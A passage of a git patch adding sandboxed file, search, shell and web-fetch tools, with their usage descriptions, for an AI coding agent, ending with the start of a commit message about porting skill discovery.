experimental_context: ctx, + } as never)) as { success: boolean; path: string; bytesWritten: number }; 
+ expect(result.success).toBe(true); + expect(result.path).toBe("src/index.ts"); + expect(result.bytesWritten).toBe(42); + expect(sb.mkdir).toHaveBeenCalledWith("/sandbox/mono/src", { recursive: true }); + expect(sb.writeFile).toHaveBeenCalledWith("/sandbox/mono/src/index.ts", "export {}", "utf-8"); + }); + + it("returns success:false on sandbox failure", async () => { + const sb = makeSandbox({ + writeFile: vi.fn().mockRejectedValue(new Error("EACCES")), + }); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = writeFileTool; + const result = (await tool.execute!({ filePath: "a.ts", content: "x" }, { + experimental_context: ctx, + } as never)) as { success: boolean; error: string }; + expect(result.success).toBe(false); + expect(result.error).toMatch(/EACCES/); + }); +}); diff --git a/lib/agent/tools/bashTool.ts b/lib/agent/tools/bashTool.ts index 908113812..479a608db 100644 --- a/lib/agent/tools/bashTool.ts +++ b/lib/agent/tools/bashTool.ts @@ -21,9 +21,9 @@ const bashInputSchema = z.object({ }); /** - * Factory for the `bash` sandbox tool. Runs `bash -c ""` inside - * the agent's sandbox via `sandbox.exec`, defaulting cwd to the sandbox's - * working directory. + * `bash` sandbox tool. Runs `bash -c ""` inside the agent's + * sandbox via `sandbox.exec`, defaulting cwd to the sandbox's working + * directory. * * Approval gating is intentionally absent — model-issued commands are * trusted in this PR. Add a host-side gate at the route/UI layer if that @@ -34,9 +34,8 @@ const bashInputSchema = z.object({ * the right org. Detached execs deliberately skip env injection — those * processes outlive the prompt. */ -export const bashTool = () => - tool({ - description: `Execute a bash command in the user's shell (non-interactive). +export const bashTool = tool({ + description: `Execute a bash command in the user's shell (non-interactive). 
WHEN TO USE: - Running existing project commands (build, test, lint, typecheck) @@ -61,56 +60,56 @@ IMPORTANT: - Never use interactive commands (vim, nano, top, bash, ssh, etc.) - Always quote file paths that may contain spaces - Use detached: true to start dev servers / long-running processes in the background`, - inputSchema: bashInputSchema, - execute: async ({ command, cwd, detached }, { experimental_context, abortSignal }) => { - const sandbox = await getSandbox(experimental_context, "bash"); - const workingDirectory = sandbox.workingDirectory; - const workingDir = cwd - ? path.isAbsolute(cwd) - ? cwd - : path.resolve(workingDirectory, cwd) - : workingDirectory; + inputSchema: bashInputSchema, + execute: async ({ command, cwd, detached }, { experimental_context, abortSignal }) => { + const sandbox = await getSandbox(experimental_context, "bash"); + const workingDirectory = sandbox.workingDirectory; + const workingDir = cwd + ? path.isAbsolute(cwd) + ? cwd + : path.resolve(workingDirectory, cwd) + : workingDirectory; - if (detached) { - if (!sandbox.execDetached) { - return { - success: false, - exitCode: null, - stdout: "", - stderr: - "Detached mode is not supported in this sandbox environment. Only cloud sandboxes support background processes.", - }; - } - try { - const { commandId } = await sandbox.execDetached(command, workingDir); - return { - success: true, - exitCode: null, - stdout: `Process started in background (command ID: ${commandId}). The server is now running.`, - stderr: "", - }; - } catch (error) { - return { - success: false, - exitCode: null, - stdout: "", - stderr: error instanceof Error ? error.message : String(error), - }; - } + if (detached) { + if (!sandbox.execDetached) { + return { + success: false, + exitCode: null, + stdout: "", + stderr: + "Detached mode is not supported in this sandbox environment. 
Only cloud sandboxes support background processes.", + }; } + try { + const { commandId } = await sandbox.execDetached(command, workingDir); + return { + success: true, + exitCode: null, + stdout: `Process started in background (command ID: ${commandId}). The server is now running.`, + stderr: "", + }; + } catch (error) { + return { + success: false, + exitCode: null, + stdout: "", + stderr: error instanceof Error ? error.message : String(error), + }; + } + } - const recoupEnv = buildRecoupExecEnv(experimental_context); - const result = await sandbox.exec(command, workingDir, TIMEOUT_MS, { - signal: abortSignal, - ...(recoupEnv ? { env: recoupEnv } : {}), - }); + const recoupEnv = buildRecoupExecEnv(experimental_context); + const result = await sandbox.exec(command, workingDir, TIMEOUT_MS, { + signal: abortSignal, + ...(recoupEnv ? { env: recoupEnv } : {}), + }); - return { - success: result.success, - exitCode: result.exitCode, - stdout: result.stdout, - stderr: result.stderr, - ...(result.truncated && { truncated: true }), - }; - }, - }); + return { + success: result.success, + exitCode: result.exitCode, + stdout: result.stdout, + stderr: result.stderr, + ...(result.truncated && { truncated: true }), + }; + }, +}); diff --git a/lib/agent/tools/editFileTool.ts b/lib/agent/tools/editFileTool.ts new file mode 100644 index 000000000..d8274c0bc --- /dev/null +++ b/lib/agent/tools/editFileTool.ts @@ -0,0 +1,100 @@ +import { tool } from "ai"; +import { z } from "zod"; +import * as path from "path"; +import { getSandbox } from "@/lib/agent/tools/getSandbox"; +import { toDisplayPath } from "@/lib/agent/tools/toDisplayPath"; + +const editInputSchema = z.object({ + filePath: z.string().describe("Workspace-relative path to the file to edit (e.g., src/auth.ts)"), + oldString: z.string().describe("The exact text to replace"), + newString: z.string().describe("The text to replace it with (must differ from oldString)"), + replaceAll: z.boolean().optional().describe("Replace all 
occurrences. Default: false"), + startLine: z + .number() + .optional() + .describe("Line number where oldString starts (for diff display)"), +}); + +/** + * `edit` — exact-string replacement inside a sandboxed file. Requires the + * model to have already read the file so it can produce a unique + * `oldString`. Rejects ambiguous matches unless `replaceAll` is set. + */ +export const editFileTool = tool({ + description: `Perform exact string replacement in a file. + +WHEN TO USE: +- Making small, precise edits to an existing file you have already read +- Renaming a variable or identifier consistently within a single file +- Changing a specific block of code or configuration exactly as seen in the read output + +WHEN NOT TO USE: +- Creating new files (use writeFileTool instead) +- Large structural rewrites where it's simpler to rewrite the entire file (use writeFileTool) + +USAGE: +- Use workspace-relative file paths (e.g., "src/auth.ts") +- You must read the file first with readFileTool in this conversation +- Provide oldString as the EXACT text to replace, including whitespace and indentation +- By default, oldString must be UNIQUE in the file; otherwise the edit will fail +- Use replaceAll: true to change ALL occurrences (e.g., for a rename) +- ALWAYS provide startLine when known: the line number where oldString begins + +IMPORTANT: +- Preserve exact indentation and spacing from the file's content as returned by readFileTool +- Never include line numbers or the "N: " line prefixes from the read output in oldString or newString +- If oldString appears multiple times and replaceAll is false, the tool FAILS with an error and occurrence count`, + inputSchema: editInputSchema, + execute: async ( + { filePath, oldString, newString, replaceAll = false }, + { experimental_context }, + ) => { + const sandbox = await getSandbox(experimental_context, "edit"); + const workingDirectory = sandbox.workingDirectory; + + try { + if (oldString === newString) { + return { success: 
false, error: "oldString and newString must be different" }; + } + + const absolutePath = path.isAbsolute(filePath) + ? filePath + : path.resolve(workingDirectory, filePath); + const content = await sandbox.readFile(absolutePath, "utf-8"); + + if (!content.includes(oldString)) { + return { + success: false, + error: "oldString not found in file", + hint: "Make sure to match exact whitespace and indentation", + }; + } + + const occurrences = content.split(oldString).length - 1; + if (occurrences > 1 && !replaceAll) { + return { + success: false, + error: `oldString found ${occurrences} times. Use replaceAll=true or provide more context to make it unique.`, + }; + } + + const matchIndex = content.indexOf(oldString); + const startLine = content.slice(0, matchIndex).split("\n").length; + const newContent = replaceAll + ? content.replaceAll(oldString, newString) + : content.replace(oldString, newString); + + await sandbox.writeFile(absolutePath, newContent, "utf-8"); + + return { + success: true, + path: toDisplayPath(absolutePath, workingDirectory), + replacements: replaceAll ? occurrences : 1, + startLine, + }; + } catch (error) { + const message = error instanceof Error ? 
error.message : String(error); + return { success: false, error: `Failed to edit file: ${message}` }; + } + }, +}); diff --git a/lib/agent/tools/globTool.ts b/lib/agent/tools/globTool.ts new file mode 100644 index 000000000..d1de234d2 --- /dev/null +++ b/lib/agent/tools/globTool.ts @@ -0,0 +1,165 @@ +import { tool } from "ai"; +import { z } from "zod"; +import * as path from "path"; +import { getSandbox } from "@/lib/agent/tools/getSandbox"; +import { shellEscape } from "@/lib/agent/tools/shellEscape"; +import { toDisplayPath } from "@/lib/agent/tools/toDisplayPath"; + +interface FileInfo { + path: string; + size: number; + modifiedAt: number; +} + +const globInputSchema = z.object({ + pattern: z.string().describe("Glob pattern to match (e.g., '**/*.ts')"), + path: z + .string() + .optional() + .describe("Workspace-relative base directory to search from (e.g., src)"), + limit: z.number().optional().describe("Maximum number of results. Default: 100"), +}); + +const GLOB_TIMEOUT_MS = 30_000; +const DEFAULT_LIMIT = 100; + +/** + * `glob` — find files matching a glob pattern, sorted by mtime (newest + * first). Skips hidden files and `node_modules`. Uses `find -printf` on + * GNU find (Linux sandboxes), falling back to `xargs stat` on BSD find. + */ +export const globTool = tool({ + description: `Find files matching a glob pattern. 
+ +WHEN TO USE: +- Locating files by extension or naming pattern (e.g., all *.test.ts files) +- Discovering where components, migrations, or configs live +- Getting a quick list of recently modified files of a given type + +WHEN NOT TO USE: +- Searching inside file contents (use grepTool instead) +- Reading file contents (use readFileTool instead) + +USAGE: +- Supports patterns like "**/*.ts", "src/**/*.js", "*.json" +- Returns FILES (not directories) sorted by modification time (newest first) +- Skips hidden files (names starting with ".") and node_modules +- If path is omitted, the current working directory is used as the base +- Use workspace-relative paths when setting path +- Results are limited by the limit parameter (default: 100) + +IMPORTANT: +- Patterns are matched primarily on the final path segment (file name), with basic "*" and "**" support +- Use this to narrow down candidate files before calling readFileTool or grepTool`, + inputSchema: globInputSchema, + execute: async ( + { pattern, path: basePath, limit = DEFAULT_LIMIT }, + { experimental_context, abortSignal }, + ) => { + const sandbox = await getSandbox(experimental_context, "glob"); + const workingDirectory = sandbox.workingDirectory; + + try { + let searchDir: string; + if (basePath) { + searchDir = path.isAbsolute(basePath) ? basePath : path.resolve(workingDirectory, basePath); + } else { + searchDir = workingDirectory; + } + + // Extract file-name pattern (last segment) + literal directory prefix + // (segments before any wildcards) so we can constrain `find -maxdepth`. + const patternParts = pattern.split("/").filter(Boolean); + const namePattern = patternParts[patternParts.length - 1] ?? 
"*"; + const literalPrefix: string[] = []; + for (let i = 0; i < patternParts.length - 1; i++) { + const part = patternParts[i]!; + if (part.includes("*") || part.includes("?") || part.includes("[")) break; + literalPrefix.push(part); + } + if (literalPrefix.length > 0) { + searchDir = path.join(searchDir, ...literalPrefix); + } + + const remainingDirSegments = patternParts.slice( + literalPrefix.length, + patternParts.length - 1, + ); + const hasRecursiveWildcard = + remainingDirSegments.some(s => s === "**") || namePattern === "**"; + + let maxDepth: number | undefined; + if (!hasRecursiveWildcard) { + maxDepth = remainingDirSegments.length + 1; + } + + const findArgs: string[] = ["find", shellEscape(searchDir)]; + if (maxDepth !== undefined) findArgs.push("-maxdepth", String(maxDepth)); + findArgs.push( + "-not", + "-path", + "'*/.*'", + "-not", + "-path", + "'*/node_modules/*'", + "-type", + "f", + "-name", + shellEscape(namePattern), + ); + + // GNU `find -printf` (Linux) vs BSD `find` (macOS) compatibility. + const findBase = findArgs.join(" "); + const command = [ + `{ ${findBase} -printf '%T@\\t%s\\t%p\\n' 2>/dev/null`, + `|| ${findBase} -print0 | xargs -0 stat -f '%m%t%z%t%N' ; }`, + `| sort -t$'\\t' -k1 -rn | head -n ${limit}`, + ].join(" "); + + const result = await sandbox.exec(command, workingDirectory, GLOB_TIMEOUT_MS, { + signal: abortSignal, + }); + + // find may exit 1 on permission errors but still produce valid output. 
+ if (!result.success && result.exitCode !== 1) { + return { + success: false, + error: `Glob failed (exit ${result.exitCode}): ${result.stdout.slice(0, 500)}`, + }; + } + + const files: FileInfo[] = []; + const lines = result.stdout.split("\n").filter(Boolean); + for (const line of lines) { + const firstTab = line.indexOf("\t"); + if (firstTab === -1) continue; + const secondTab = line.indexOf("\t", firstTab + 1); + if (secondTab === -1) continue; + const mtimeSeconds = parseFloat(line.slice(0, firstTab)); + const size = parseInt(line.slice(firstTab + 1, secondTab), 10); + const filePath = line.slice(secondTab + 1); + if (isNaN(mtimeSeconds) || isNaN(size) || !filePath) continue; + files.push({ + path: toDisplayPath(filePath, workingDirectory), + size, + modifiedAt: mtimeSeconds * 1000, + }); + } + + return { + success: true, + pattern, + baseDir: toDisplayPath(searchDir, workingDirectory), + count: files.length, + files: files.map(f => ({ + path: f.path, + size: f.size, + modifiedAt: new Date(f.modifiedAt).toISOString(), + })), + }; + } catch (error) { + const message = error instanceof Error ? 
error.message : String(error); + return { success: false, error: `Glob failed: ${message}` }; + } + }, +}); diff --git a/lib/agent/tools/grepTool.ts b/lib/agent/tools/grepTool.ts new file mode 100644 index 000000000..f172f61af --- /dev/null +++ b/lib/agent/tools/grepTool.ts @@ -0,0 +1,143 @@ +import { tool } from "ai"; +import { z } from "zod"; +import * as path from "path"; +import { getSandbox } from "@/lib/agent/tools/getSandbox"; +import { shellEscape } from "@/lib/agent/tools/shellEscape"; +import { toDisplayPath } from "@/lib/agent/tools/toDisplayPath"; + +interface GrepMatch { + file: string; + line: number; + content: string; +} + +const grepInputSchema = z.object({ + pattern: z.string().describe("Regex pattern to search for"), + path: z.string().describe("Workspace-relative file or directory to search in (e.g., src)"), + glob: z.string().optional().describe("Glob pattern to filter files (e.g., '*.ts')"), + caseSensitive: z.boolean().optional().describe("Case-sensitive search. Default: true"), +}); + +const GREP_TIMEOUT_MS = 30_000; +const MAX_TOTAL_MATCHES = 100; +const MAX_PER_FILE_MATCHES = 10; +const MAX_LINE_LENGTH = 200; + +/** + * `grep` — search for POSIX-ERE patterns across files in the sandbox via + * `grep -rn`. Caps results to 100 total / 10 per file / 200 chars per + * match line so long stdouts don't blow the model context. + */ +export const grepTool = tool({ + description: `Search for patterns in files using POSIX Extended Regular Expressions (ERE). 
+ +WHEN TO USE: +- Finding where a function, variable, or string literal is used +- Locating configuration keys, routes, or error messages across files +- Narrowing down which files to read or edit + +WHEN NOT TO USE: +- Simple filename-only searches (use globTool instead) +- Directory listings, builds, or other shell tasks (use bashTool instead) + +USAGE: +- Uses POSIX ERE syntax (e.g., "log.*Error", "function[[:space:]]+[a-zA-Z_]+") +- Perl-style shorthands like \\s, \\w, \\d are NOT supported; use POSIX classes instead: [[:space:]], [[:alnum:]_], [[:digit:]] +- Search a specific file OR an entire directory via the path parameter +- Use workspace-relative paths for path (e.g., "src") +- Optionally filter files with glob (e.g., "*.ts", "*.test.js") +- Matches are SINGLE-LINE: patterns do not span across newline characters +- Results are limited to 100 matches total, with up to 10 matches per file; each match line is truncated to 200 characters + +IMPORTANT: +- ALWAYS use this tool for code/content searches instead of running grep/rg via bashTool +- Use caseSensitive: false for case-insensitive searches +- Hidden files and node_modules are skipped when searching directories`, + inputSchema: grepInputSchema, + execute: async ( + { pattern, path: searchPath, glob, caseSensitive = true }, + { experimental_context, abortSignal }, + ) => { + const sandbox = await getSandbox(experimental_context, "grep"); + const workingDirectory = sandbox.workingDirectory; + + try { + const absolutePath = path.isAbsolute(searchPath) + ? 
searchPath + : path.resolve(workingDirectory, searchPath); + + const args: string[] = ["grep", "-rn"]; + if (!caseSensitive) args.push("-i"); + args.push( + `--exclude-dir=${shellEscape(".*")}`, + `--exclude-dir=${shellEscape("node_modules")}`, + ); + if (glob) args.push(`--include=${shellEscape(glob)}`); + args.push( + "-m", + String(MAX_PER_FILE_MATCHES), + "-E", + shellEscape(pattern), + shellEscape(absolutePath), + ); + const command = args.join(" "); + + const result = await sandbox.exec(command, workingDirectory, GREP_TIMEOUT_MS, { + signal: abortSignal, + }); + + // grep exits with 1 when no matches found — that's not an error. + if (!result.success && result.exitCode !== 1) { + const errorOutput = (result.stderr || result.stdout).slice(0, 500); + return { + success: false, + error: `Grep failed (exit ${result.exitCode}): ${errorOutput}`, + }; + } + + const matches: GrepMatch[] = []; + const filesSet = new Set(); + const fileMatchCounts = new Map(); + + const lines = result.stdout.split("\n").filter(Boolean); + for (const line of lines) { + if (matches.length >= MAX_TOTAL_MATCHES) break; + + // grep -rn output: file:line:content. Find the `:digits:` separator. + const match = line.match(/:(\d+):/); + if (!match || match.index === undefined) continue; + const file = line.slice(0, match.index); + const rest = line.slice(match.index + 1); + const colonIndex = rest.indexOf(":"); + if (colonIndex === -1) continue; + + const lineNum = parseInt(rest.slice(0, colonIndex), 10); + const content = rest.slice(colonIndex + 1); + if (isNaN(lineNum)) continue; + + const displayFile = toDisplayPath(file, workingDirectory); + filesSet.add(displayFile); + const currentFileCount = fileMatchCounts.get(displayFile) ?? 
0; + if (currentFileCount >= MAX_PER_FILE_MATCHES) continue; + + fileMatchCounts.set(displayFile, currentFileCount + 1); + matches.push({ + file: displayFile, + line: lineNum, + content: content.slice(0, MAX_LINE_LENGTH), + }); + } + + return { + success: true, + pattern, + matchCount: matches.length, + filesWithMatches: filesSet.size, + matches, + }; + } catch (error) { + const message = error instanceof Error ? error.message : String(error); + return { success: false, error: `Grep failed: ${message}` }; + } + }, +}); diff --git a/lib/agent/tools/readFileTool.ts b/lib/agent/tools/readFileTool.ts new file mode 100644 index 000000000..f5a486a64 --- /dev/null +++ b/lib/agent/tools/readFileTool.ts @@ -0,0 +1,70 @@ +import { tool } from "ai"; +import { z } from "zod"; +import * as path from "path"; +import { getSandbox } from "@/lib/agent/tools/getSandbox"; +import { toDisplayPath } from "@/lib/agent/tools/toDisplayPath"; + +const readInputSchema = z.object({ + filePath: z.string().describe("Workspace-relative path to the file to read (e.g., src/index.ts)"), + offset: z.number().optional().describe("Line number to start reading from (1-indexed)"), + limit: z.number().optional().describe("Maximum number of lines to read. Default: 2000"), +}); + +/** + * `read` — read a file from the sandbox. Returns numbered lines in the + * format `N: ` so the model can refer to specific lines when + * later editing. + */ +export const readFileTool = tool({ + description: `Read a file from the filesystem. 
+ +USAGE: +- Use workspace-relative paths (e.g., "src/index.ts") +- Paths are resolved from the workspace root +- By default reads up to 2000 lines starting from line 1 +- Use offset and limit for long files (both are line-based, 1-indexed) +- Results include line numbers starting at 1 in "N: content" format + +IMPORTANT: +- Always read a file at least once before editing it with the edit/write tools +- This tool can only read files, not directories — attempting to read a directory returns an error +- You can call multiple reads in parallel to speculatively load several files`, + inputSchema: readInputSchema, + execute: async ({ filePath, offset = 1, limit = 2000 }, { experimental_context }) => { + const sandbox = await getSandbox(experimental_context, "read"); + const workingDirectory = sandbox.workingDirectory; + + try { + const absolutePath = path.isAbsolute(filePath) + ? filePath + : path.resolve(workingDirectory, filePath); + + const stats = await sandbox.stat(absolutePath); + if (stats.isDirectory()) { + return { + success: false, + error: "Cannot read a directory. Use glob or ls command instead.", + }; + } + + const content = await sandbox.readFile(absolutePath, "utf-8"); + const lines = content.split("\n"); + const startLine = Math.max(1, offset) - 1; + const endLine = Math.min(lines.length, startLine + limit); + const selectedLines = lines.slice(startLine, endLine); + const numberedLines = selectedLines.map((line, i) => `${startLine + i + 1}: ${line}`); + + return { + success: true, + path: toDisplayPath(absolutePath, workingDirectory), + totalLines: lines.length, + startLine: startLine + 1, + endLine, + content: numberedLines.join("\n"), + }; + } catch (error) { + const message = error instanceof Error ? 
error.message : String(error); + return { success: false, error: `Failed to read file: ${message}` }; + } + }, +}); diff --git a/lib/agent/tools/shellEscape.ts b/lib/agent/tools/shellEscape.ts new file mode 100644 index 000000000..8ba4a71a3 --- /dev/null +++ b/lib/agent/tools/shellEscape.ts @@ -0,0 +1,14 @@ +/** + * Escape a string for safe use as a single-quoted shell argument. + * + * Wraps the string in single quotes and escapes any embedded single + * quotes via the standard `' → '\''` dance (close quote, escape literal + * quote, reopen quote). Everything else stays verbatim inside single + * quotes — shell metacharacters like `$`, `` ` ``, `&`, `*` are NOT + * expanded so the result is safe to pass to `bash -c` or `sh -c`. + * + * @param s - The string to escape. + */ +export function shellEscape(s: string): string { + return "'" + s.replace(/'/g, "'\\''") + "'"; +} diff --git a/lib/agent/tools/toDisplayPath.ts b/lib/agent/tools/toDisplayPath.ts new file mode 100644 index 000000000..827c391af --- /dev/null +++ b/lib/agent/tools/toDisplayPath.ts @@ -0,0 +1,34 @@ +import * as path from "path"; + +function isPathWithinDirectory(filePath: string, directory: string): boolean { + const resolvedPath = path.resolve(filePath); + const resolvedDir = path.resolve(directory); + return resolvedPath.startsWith(resolvedDir + path.sep) || resolvedPath === resolvedDir; +} + +/** + * Convert an absolute (or relative-to-workingDirectory) path into a compact + * model-friendly display path. + * + * Paths inside the working directory are returned relative (e.g. + * `src/index.ts`) to avoid repeating long absolute prefixes in tool output. + * Paths outside the working directory remain absolute for clarity and safety + * (e.g. `/etc/hosts`). All separators are normalized to `/`. + * + * @param filePath - Absolute or workspace-relative file path. + * @param workingDirectory - The sandbox's working directory (always absolute). 
+ */ +export function toDisplayPath(filePath: string, workingDirectory: string): string { + const absolutePath = path.isAbsolute(filePath) + ? path.resolve(filePath) + : path.resolve(workingDirectory, filePath); + + if (!isPathWithinDirectory(absolutePath, workingDirectory)) { + return absolutePath.replace(/\\/g, "/"); + } + + const relativePath = path.relative(workingDirectory, absolutePath); + if (relativePath === "") return "."; + + return relativePath.replace(/\\/g, "/"); +} diff --git a/lib/agent/tools/todoWriteTool.ts b/lib/agent/tools/todoWriteTool.ts new file mode 100644 index 000000000..d91e9147a --- /dev/null +++ b/lib/agent/tools/todoWriteTool.ts @@ -0,0 +1,65 @@ +import { tool } from "ai"; +import { z } from "zod"; + +export const todoStatusSchema = z.enum(["pending", "in_progress", "completed"]); +export type TodoStatus = z.infer; + +export const todoItemSchema = z.object({ + id: z.string().describe("Unique identifier for the todo item"), + content: z.string().describe("The task description"), + status: todoStatusSchema.describe( + "Current status. Only ONE task should be in_progress at a time.", + ), +}); +export type TodoItem = z.infer; + +/** + * `todo_write` — the agent's planning surface. Stateless on the server side + * (the tool simply echoes the list back to the chat UI so the user sees the + * current plan). The agent uses this to track multi-step work and signal + * intent between turns. + * + * Slot into `buildAgentTools` as `todo_write: todoWriteTool`. + */ +export const todoWriteTool = tool({ + description: `Create and manage a structured task list for the current session. 
+ +WHEN TO USE: +- Complex multi-step tasks requiring 3 or more distinct steps +- When the user provides multiple requirements or a checklist +- After receiving new instructions - immediately capture them as todos +- When starting work on a task - mark that todo as in_progress BEFORE beginning +- After completing a task - mark it as completed immediately + +WHEN NOT TO USE: +- A single, straightforward task that can be done in one step +- Trivial tasks requiring fewer than 3 minor steps +- Purely conversational or informational queries + +TASK STATES: +- "pending": Task not yet started +- "in_progress": Currently being worked on (ONLY ONE todo should be in this state at a time) +- "completed": Task finished successfully + +USAGE: +- This tool REPLACES the entire todo list - always send the full, updated list of todos +- Use it frequently to keep the task list in sync with your actual progress +- Update statuses as you start and finish work, rather than batching updates later + +IMPORTANT: +- Only one todo should be in_progress at a time; avoid parallel in_progress tasks +- Mark todos as completed as soon as they are done - do not wait to batch completions +- Use clear, concise todo content so the list remains readable to the user`, + inputSchema: z.object({ + todos: z + .array(todoItemSchema) + .describe("The complete list of todo items. 
This replaces existing todos."), + }), + execute: async ({ todos }) => { + return { + success: true, + message: `Updated task list with ${todos.length} items`, + todos, + }; + }, +}); diff --git a/lib/agent/tools/webFetchTool.ts b/lib/agent/tools/webFetchTool.ts new file mode 100644 index 000000000..b395457f9 --- /dev/null +++ b/lib/agent/tools/webFetchTool.ts @@ -0,0 +1,124 @@ +import { tool } from "ai"; +import { z } from "zod"; +import { buildRecoupExecEnv } from "@/lib/agent/tools/buildRecoupExecEnv"; +import { getSandbox } from "@/lib/agent/tools/getSandbox"; +import { shellEscape } from "@/lib/agent/tools/shellEscape"; + +const FETCH_TIMEOUT_MS = 30_000; +export const MAX_BODY_LENGTH = 10_000; + +const fetchInputSchema = z.object({ + url: z.string().url().describe("The URL to fetch"), + method: z + .enum(["GET", "POST", "PUT", "PATCH", "DELETE", "HEAD"]) + .optional() + .describe("HTTP method. Default: GET"), + headers: z + .record(z.string(), z.string()) + .optional() + .describe("Optional HTTP headers as key-value pairs"), + body: z.string().optional().describe("Optional request body (for POST/PUT/PATCH)"), +}); + +const fetchOutputSchema = z.union([ + z.object({ + success: z.literal(true), + status: z.number().int().nullable(), + body: z.string(), + truncated: z.boolean(), + }), + z.object({ success: z.literal(false), error: z.string() }), +]); + +/** + * `web_fetch` — make an HTTP request from inside the sandbox via curl. + * Lives in the sandbox (not on the worker) so requests come from the + * sandbox's network egress, can reuse its env, and don't bypass any + * sandbox-level policies. Truncates response bodies to 10KB to protect + * model context. + */ +export const webFetchTool = tool({ + description: `Fetch a URL from the web. 
+ +USAGE: +- Make HTTP requests to external URLs +- Supports GET, POST, PUT, PATCH, DELETE, and HEAD methods +- Returns the response status and body text +- Body is truncated to ${MAX_BODY_LENGTH} characters to avoid overwhelming context`, + inputSchema: fetchInputSchema, + outputSchema: fetchOutputSchema, + execute: async ( + { url, method = "GET", headers, body }, + { experimental_context, abortSignal }, + ) => { + const sandbox = await getSandbox(experimental_context, "web_fetch"); + const workingDirectory = sandbox.workingDirectory; + const recoupEnv = buildRecoupExecEnv(experimental_context); + + const args: string[] = [ + "curl", + "-sS", + // "-X HEAD" only renames the verb and curl still waits for a body; --head issues a real HEAD request. + ...(method === "HEAD" ? ["--head"] : ["-X", method]), + "--max-time", + String(Math.ceil(FETCH_TIMEOUT_MS / 1000)), + "-o", + `>(head -c ${MAX_BODY_LENGTH} >&3)`, + "-w", + shellEscape("%{http_code}"), + ]; + + if (headers) { + for (const [key, value] of Object.entries(headers)) { + args.push("-H", shellEscape(`${key}: ${value}`)); + } + } + if (method !== "GET" && method !== "HEAD" && body) { + args.push("-d", shellEscape(body)); + } + args.push(shellEscape(url)); + + // Use fd 3 to split curl's response body (truncated by `head -c`) from + // the status code written via `-w`. The body goes to stdout via fd 3 + // → fd 1, then we append the status code on its own newline. + const command = [ + "exec 3>&1", + `status=$(${args.join(" ")})`, + "curlExit=$?", + "exec 3>&-", + "printf '\\n%s' \"$status\"", + "exit $curlExit", + ].join("\n"); + + try { + const result = await sandbox.exec(command, workingDirectory, FETCH_TIMEOUT_MS, { + signal: abortSignal, + ...(recoupEnv ? { env: recoupEnv } : {}), + }); + + // exit 23 = curl wrote partial output (`head -c` cut it off — expected for large responses). + if (result.exitCode !== 0 && result.exitCode !== 23) { + return { + success: false, + error: `Fetch failed: ${result.stderr || result.stdout || "Unknown error"}`, + }; + } + + const output = result.stdout ?? 
""; + const lastNewline = output.lastIndexOf("\n"); + const statusText = lastNewline !== -1 ? output.slice(lastNewline + 1).trim() : ""; + const responseBody = lastNewline !== -1 ? output.slice(0, lastNewline) : output; + const status = /^\d+$/.test(statusText) ? parseInt(statusText, 10) : null; + + return { + success: true, + status, + body: responseBody, + truncated: result.exitCode === 23, + }; + } catch (error) { + const message = error instanceof Error ? error.message : String(error); + return { success: false, error: `Fetch failed: ${message}` }; + } + }, +}); diff --git a/lib/agent/tools/writeFileTool.ts b/lib/agent/tools/writeFileTool.ts new file mode 100644 index 000000000..c8e59e3c3 --- /dev/null +++ b/lib/agent/tools/writeFileTool.ts @@ -0,0 +1,65 @@ +import { tool } from "ai"; +import { z } from "zod"; +import * as path from "path"; +import { getSandbox } from "@/lib/agent/tools/getSandbox"; +import { toDisplayPath } from "@/lib/agent/tools/toDisplayPath"; + +const writeInputSchema = z.object({ + filePath: z + .string() + .describe("Workspace-relative path to the file to write (e.g., src/user.test.ts)"), + content: z.string().describe("Content to write to the file"), +}); + +/** + * `write` — create or completely overwrite a file in the sandbox. Parent + * directories are created as needed. For small targeted edits prefer + * `editFileTool`. + */ +export const writeFileTool = tool({ + description: `Write content to a file on the filesystem. 
+ +WHEN TO USE: +- Creating a new file that does not yet exist +- Completely replacing the contents of an existing file after you've read it + +WHEN NOT TO USE: +- Small or localized changes to an existing file (prefer editFileTool) +- Reading files (use readFileTool instead) +- Searching (use grepTool or globTool instead) + +USAGE: +- Use workspace-relative paths (e.g., "src/user.test.ts") +- This will OVERWRITE existing files entirely +- Parent directories are created automatically if they do not exist + +IMPORTANT: +- ALWAYS read an existing file with readFileTool before overwriting it +- Prefer editing existing files over creating new ones unless a new file is explicitly needed +- NEVER proactively create documentation files (e.g., *.md) unless the user explicitly requests them +- Do not write files that contain secrets or credentials (API keys, passwords, .env, etc.)`, + inputSchema: writeInputSchema, + execute: async ({ filePath, content }, { experimental_context }) => { + const sandbox = await getSandbox(experimental_context, "write"); + const workingDirectory = sandbox.workingDirectory; + + try { + const absolutePath = path.isAbsolute(filePath) + ? filePath + : path.resolve(workingDirectory, filePath); + const dir = path.dirname(absolutePath); + await sandbox.mkdir(dir, { recursive: true }); + await sandbox.writeFile(absolutePath, content, "utf-8"); + const stats = await sandbox.stat(absolutePath); + + return { + success: true, + path: toDisplayPath(absolutePath, workingDirectory), + bytesWritten: stats.size, + }; + } catch (error) { + const message = error instanceof Error ? 
error.message : String(error); + return { success: false, error: `Failed to write file: ${message}` }; + } + }, +}); From 5e1a386463c7f25fd733d1711c2a28a0afc1b8a1 Mon Sep 17 00:00:00 2001 From: "sweetman.eth" Date: Thu, 21 May 2026 14:47:56 -0500 Subject: [PATCH 05/10] feat(chat-workflow): port skill discovery + skillTool (PR 6, slim) (#587) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * feat(chat-workflow): port skill discovery + skillTool (PR 6, slim) Ports the `skill` composite tool from open-agents along with the skill discovery layer it depends on. The handler now connects to the sandbox before workflow start, scans `${workingDirectory}/skills/` for project- level skills, and threads the catalog into the workflow via `AgentContext.skills`. The `skill` tool is registered in `buildAgentTools` only when the catalog is non-empty — so models in sandboxes without skills never see the tool. New skills layer (lib/skills/): - skillTypes.ts — SkillMetadata, SkillOptions, skillFrontmatterSchema, frontmatterToOptions (Zod schema + camelCase normalization) - parseSkillFrontmatter.ts — hand-rolled YAML subset parser (key:value, quoted strings, booleans; preserves colons in URLs) - extractSkillBody.ts — strip frontmatter, return body - substituteArguments.ts — $ARGUMENTS replacement - injectSkillDirectory.ts — prepend `Skill directory: ` - discoverSkills.ts — scan dirs, parse frontmatter, dedupe by name, drop names that shadow built-in /model /resume /new - getSandboxSkillDirectories.ts — slim: `[${workingDirectory}/skills]` only. Global skills (~/.skills) port later alongside short-lived token minting New tool: lib/agent/tools/skillTool.ts — case-insensitive lookup, respects `disable-model-invocation`, surfaces available-skills list on unknown name. Loads SKILL.md content, applies 